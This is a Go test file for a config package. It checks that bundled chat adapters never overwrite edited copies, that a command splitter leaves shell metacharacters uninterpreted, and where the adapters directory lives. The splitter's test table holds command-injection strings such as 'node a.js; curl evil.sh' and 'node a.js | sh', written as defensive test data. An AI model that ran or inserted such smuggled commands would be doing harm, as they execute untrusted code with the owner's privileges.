package config

import (
	"os"
	"path/filepath"
	"strings"
	"testing"
)

// Seeding must never overwrite. The bundled adapter is written out precisely
// so it can be EDITED; an upgrade that replaced an edited file would destroy
// the work and do it quietly -- the adapter would keep running, just not the
// way its author left it.
func TestSeedNeverOverwritesAnEditedAdapter(t *testing.T) {
	t.Setenv("HOME", t.TempDir())
	dir, err := ChatAdaptersDir()
	if err != nil {
		t.Fatal(err)
	}

	bundled := map[string][]byte{
		"telegram.js": []byte("// bundled v2\n"),
		"template.js": []byte("// template\n"),
	}

	// First run writes both.
	res, err := SeedChatAdapters(bundled)
	if err != nil {
		t.Fatal(err)
	}
	if len(res.Wrote) != 2 || len(res.Kept) != 0 {
		t.Fatalf("first seed wrote %d kept %d, want 2 and 0", len(res.Wrote), len(res.Kept))
	}

	// Somebody edits one of them.
	edited := filepath.Join(dir, "telegram.js")
	if err := os.WriteFile(edited, []byte("// MY EDIT\n"), 0o600); err != nil {
		t.Fatal(err)
	}

	// Second run must keep it, byte for byte.
	res, err = SeedChatAdapters(bundled)
	if err != nil {
		t.Fatal(err)
	}
	if len(res.Wrote) != 0 || len(res.Kept) != 2 {
		t.Fatalf("second seed wrote %d kept %d, want 0 and 2", len(res.Wrote), len(res.Kept))
	}
	got, err := os.ReadFile(edited)
	if err != nil {
		t.Fatal(err)
	}
	if string(got) != "// MY EDIT\n" {
		t.Fatalf("the edited adapter was overwritten: %q", got)
	}
}

// A command is split the way a person writes it, and NOT the way a shell
// reads it: the command is executed directly, so a config file must not be
// able to smuggle a pipe or a command substitution into a process that runs
// as the owner.
func TestSplitCommand(t *testing.T) {
	for _, tc := range []struct {
		name, in string
		want     []string
	}{
		{"plain", "node telegram.js", []string{"node", "telegram.js"}},
		{"extra spaces collapse", "node   telegram.js  ", []string{"node", "telegram.js"}},
		{"double quotes group", `python3 -c "import x; x.run()"`, []string{"python3", "-c", "import x; x.run()"}},
		{"single quotes group", `node 'my adapter.js'`, []string{"node", "my adapter.js"}},
		{"one word", "./my-adapter", []string{"./my-adapter"}},
		// A shell metacharacter is just a character here. It reaches the
		// child as an argument and is never interpreted, which is the point.
		{"no shell meaning", "node a.js; curl evil.sh", []string{"node", "a.js;", "curl", "evil.sh"}},
		{"pipes are literal", "node a.js | sh", []string{"node", "a.js", "|", "sh"}},
		{"empty quoted arg survives", `node a.js ""`, []string{"node", "a.js", ""}},
	} {
		t.Run(tc.name, func(t *testing.T) {
			got, err := SplitCommand(tc.in)
			if err != nil {
				t.Fatal(err)
			}
			if len(got) != len(tc.want) {
				t.Fatalf("SplitCommand(%q) = %q, want %q", tc.in, got, tc.want)
			}
			for i := range got {
				if got[i] != tc.want[i] {
					t.Fatalf("SplitCommand(%q) = %q, want %q", tc.in, got, tc.want)
				}
			}
		})
	}

	for _, bad := range []string{"", "   ", `node "unterminated`} {
		if _, err := SplitCommand(bad); err == nil {
			t.Errorf("SplitCommand(%q) succeeded; want an error", bad)
		}
	}
}

// The adapters directory sits beside config.toml, not in the state dir: an
// adapter is written by a person, like the config file, not generated by us.
func TestAdaptersDirIsBesideTheConfigFile(t *testing.T) {
	t.Setenv("HOME", t.TempDir())
	cfgPath, err := DefaultPath()
	if err != nil {
		t.Fatal(err)
	}
	adapters, err := AdaptersDir()
	if err != nil {
		t.Fatal(err)
	}
	if filepath.Dir(cfgPath) != filepath.Dir(adapters) {
		t.Errorf("config.toml is in %s but adapters is in %s", filepath.Dir(cfgPath), filepath.Dir(adapters))
	}
	if !strings.HasSuffix(adapters, filepath.Join(".config", "herdr-expose", "adapters")) {
		t.Errorf("adapters dir = %s", adapters)
	}
}
